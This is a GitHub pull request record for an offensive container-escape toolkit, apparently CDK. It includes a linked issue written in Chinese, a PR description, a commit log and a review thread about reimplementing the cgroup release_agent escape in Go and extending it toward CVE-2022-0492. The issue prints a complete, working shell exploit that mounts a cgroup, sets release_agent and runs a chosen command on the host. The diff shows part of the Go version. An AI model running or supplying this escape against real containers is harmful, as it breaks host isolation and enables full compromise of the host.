### PR TITLE
[Draft] Implement mount-cgroup in Golang style and CVE-2022-0492

### LINKED ISSUE #35: mount-cgroup无法多次执行命令
## 请详细描述你遇到的问题 (Please describe the issue in detail)
mount-cgroup无法多次执行命令
```
root@0a8d085e98bf:/cdk# ./cdk_linux_amd64 run mount-cgroup "whoami"
2022/01/25 02:17:56 user-defined shell payload is whoami
2022/01/25 02:17:56 generate shell exploit with user-input cmd:

whoami

#!/bin/sh
mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq
echo 1 > /tmp/cgrp/cdk_oeq/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd_oeq" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd_oeq
echo "whoami > $host_path/output_oeq" >> /cmd_oeq
chmod a+x /cmd_oeq
sh -c "echo \$\$ > /tmp/cgrp/cdk_oeq/cgroup.procs"
sleep 3
cat /output_oeq

2022/01/25 02:17:56 shell script saved to exploit_oeq.sh
2022/01/25 02:17:59 Execute Shell:./exploit_oeq.sh . failed:
exit status 1

```

## 附加信息(Additional Information)

1、根据分析发现，生成的payload脚本中
```
mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq
````
由于mount在第一次已经挂载导致命令执行异常 从而影响`mkdir -p /tmp/cgrp/cdk_oeq`命令的执行

需要修改&&命令连接符 以解决该问题

### PR DESCRIPTION
**Pull request by kmahyyg**
feat(exp/mount_cgroup.go): completely fix #35 in golang-style

This implemented mount-cgroup exploit totally in Golang.

Detailed information:
- Change whole "create-mount-write" process using Golang native Unix API.
- To avoid conflict, increase length of random string from 3 to 4.
Tasks sub-cgroup are also in the same kind of random name.
- Read mounted filesystem information from /proc/self/mountinfo, instead of /etc/mtab .
- Due to the limitation of exec.Command, output redirect is implemented in another way: manually get pid and write to cgroups.procs

Further enhancement:
- To read the container filesystem path on the host, implement to read `superBlockOptions` of MountInfo.
- To implement CVE-2022-0492 in this PR further, I modified EscapeCgroup function, so that it can be re-used for other subsystems.

Chores:
- `go mod tidy`
- Fix Typo
- Run a much quicker random string generator

```
1b94046 (HEAD -> main, origin/main, origin/HEAD) feat(exp/mount_cgroup.go): completely fix #35 in golang-style
043d6b6 feat(util/cgroup.go): add superBlockOptions when parsing /proc/self/mountinfo
4c640ae fix(util/cgroup.go): typo: marjor -> major
60b44e5 fix(exp/mount-cgroup): fix #35 in shell-style in a simple way
ecfadba optimize(exp/mount-cgroup): update build constraint, cgroup is linux only
ef056df optimize(util/common.go): Quicker Random String Generator
```

### CODE REVIEW

**Comment by kmahyyg** [comment]
CleanShot 2022-03-09 at 20 40 49@2x

File: pkg/exploit/mount_cgroup.go [hunk 1]
```diff
@@ -33,55 +39,116 @@ import (
...
+	}
+	// write release_agent
+	err = ioutil.WriteFile(mountPointPath+"/release_agent", []byte(hostPath+outFile), 0644)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "release_agent is not writable"}
+	}
+
+	// trigger release
+	// sleep 2s for debug purpose
+	addProcCmd := exec.Command("/bin/sh", "-c", "sleep 2")
```
Comment (neargle) [inline pkg/exploit/mount_cgroup.go:133]: why sleep here？

**Comment by neargle** [comment]
Awesome! Elegant implementation ~ more elegant than half of the code I wrote !

**Review by neargle — COMMENTED** [review]
LGTM~

File: pkg/exploit/mount_cgroup.go (hunk 1 above)
Comment (kmahyyg) [reply pkg/exploit/mount_cgroup.go:133]: Well it need some time to read the PID of spawned `/bin/sh`, And also  use `/bin/sh -c echo $$` then put the command stdout to `cgroup.procs` will cause unknown reason error with exit code 1. So I use another way to achieve this. 

You could also monitor this behaviour by adding auditd rule `-a always,exit -F arch=b64 -S execve -F key=procmo` which made debug much more easier than before.

**Pull request merged**